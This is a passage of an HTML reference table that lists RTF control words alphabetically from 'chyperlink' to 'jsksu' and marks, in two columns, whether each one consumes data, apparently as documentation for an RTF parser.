<th scope="row">chyperlink</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clFitText</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clNoWrap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgdkbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgdkcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgdkdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgdkfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgdkhor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgdkvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbghoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbgvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbrdrb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbrdrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbrdrr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clbrdrt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cldel</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cldgll</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cldglu</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clhidemark</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clins</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clmgf</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clmrg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clmrgd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clmrgdr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clshdrawnil</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clsplit</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clsplitr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cltxbtlr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cltxlrtb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cltxlrtbv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cltxtbrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cltxtbrlv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clvertalb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clvertalc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clvertalt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clvmgf</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clvmrg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cmaindarkone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cmaindarktwo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cmainlightone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cmainlighttwo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">collapsed</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">colorschememapping</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">colortbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">comment</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">company</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">contextualspace</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">creatim</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ctextone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ctexttwo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ctrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cvmme</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">datafield</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">datastore</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">date</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dbch</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">defchp</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">defformat</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">defpap</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">defshp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dgmargin</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dgsnap</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">dntblnsbdb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">do</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">dobxcolumn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dobxmargin</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dobxpage</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dobymargin</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dobypage</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dobypara</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">doccomm</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">doctemp</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">docvar</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">dolock</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">donotshowcomments</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">donotshowinsdel</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">donotshowmarkup</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">donotshowprops</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpaendhol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpaendsol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dparc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dparcflipx</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dparcflipy</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpastarthol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpastartsol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcallout</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcoaccent</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcobestfit</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcoborder</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcodabs</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcodbottom</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcodcenter</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcodtop</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcominusx</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcominusy</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcosmarta</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcotdouble</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcotright</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcotsingle</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcottriple</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpellipse</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpendgroup</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpfillbgpal</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpfillfgpal</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpgroup</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpline</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dplinedado</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dplinedadodo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dplinedash</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dplinedot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dplinehollow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dplinepal</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dplinesolid</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dppolygon</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dppolyline</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dprect</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dproundr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpshadow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dptxbtlr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dptxbx</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dptxbxtext</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">dptxlrtb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dptxlrtbv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dptxtbrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dptxtbrlv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ebcend</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ebcstart</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">emfblip</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">enddoc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">endnhere</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">endnotes</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">expshrtn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">faauto</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">facenter</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">facingp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">factoidname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fafixed</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fahang</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">falt</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">faroman</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">favar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fbidi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fbidis</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fbimajor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fbiminor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fchars</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fdbmajor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fdbminor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fdecor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">felnbrelev</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fetch</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffdeftext</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffentrymcr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffexitmcr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffformat</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffhelptext</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffstattext</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fhimajor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fhiminor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">field</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">file</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">filetbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fjgothic</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fjminchou</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fldalt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">flddirty</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fldedit</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fldinst</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fldlock</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fldpriv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fldrslt</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fldtype</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">flomajor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">flominor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fmodern</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fname</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fnetwork</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fnil</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fnonfilesys</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fontemb</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fontfile</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fonttbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">footer</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">footerf</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">footerl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">footerr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">footnote</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">forceupgrade</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">formdisp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">formfield</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">formprot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">formshade</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fracwidth</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">frmtxbtlr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">frmtxlrtb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">frmtxlrtbv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">frmtxtbrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">frmtxtbrlv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">froman</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fromtext</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fscript</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fswiss</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftech</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftfalsetype</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ftnalt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnbj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftncn</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ftnil</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnlytwnine</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnalc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnauc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnchi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnchosung</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnncnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnndbar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnndbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnndbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnndbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnndbnumt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnganada</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnngbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnngbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnngbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnngbnuml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnrlc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnruc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnzodiac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnzodiacd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnzodiacl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnrestart</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnrstcont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnrstpg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnsep</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ftnsepc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ftntj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fvaliddos</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fvalidhpfs</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fvalidmac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fvalidntfs</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">g</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">generator</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">gridtbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">gutterprl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">header</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">headerf</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">headerl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">headerr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">hich</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">hl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">hlfr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">hlinkbase</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">hlloc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">hlsrc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">horzdoc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">horzsect</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">hrule</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">hsv</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">htmautsp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">htmlbase</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">htmltag</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">hwelev</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">indmirror</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">indrlsweleven</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">info</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">intbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ixe</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">jclisttab</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">jcompress</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">jexpand</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">jis</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">jpegblip</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">jsksu</th>
